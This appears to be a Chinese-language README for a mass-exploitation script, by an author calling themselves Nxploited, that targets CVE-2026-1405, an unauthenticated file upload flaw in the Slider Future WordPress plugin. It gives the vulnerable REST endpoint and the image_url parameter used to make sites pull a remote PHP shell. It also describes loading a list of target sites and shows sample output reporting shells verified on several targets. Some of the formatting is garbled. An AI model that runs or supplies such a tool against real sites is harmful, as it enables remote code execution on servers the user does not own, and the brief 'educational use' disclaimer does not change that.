Slider Future <= 1.0.5 - 未认证任意文件上传
组件: Slider Future(WordPress 插件)
受影响版本: ≤ 1.0.5
漏洞类型: 未认证任意文件上传
CVE: CVE-2026-1405
CVSS 评分: 9.8(严重)
WordPress 的 Slider Future 插件在所有版本(包括 1.0.5)中,由于 slider_future_handle_image_upload 函数缺少文件类型验证,因此存在任意文件上传漏洞。这使得未认证攻击者能够将任何文件类型(包括恶意 PHP shell)直接上传到受影响服务器,从而实现远程代码执行。
/wp-json/slider-future/v1/upload-image/image_url 参数上传远程 PHP shell(无需认证)。http://example1.com
https://example2.com
...
示例:http://yourserver.com/shell.php
python3 CVE-2026-1405.py
脚本会提示您输入以下内容:
list.txt)Nxploited)success_results.txt。/wp-json/slider-future/v1/upload-image/image_url。此工具仅用于教育和授权安全测试目的。
未经授权使用本工具来测试您不拥有或未经明确许可的网站属于违法行为。
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt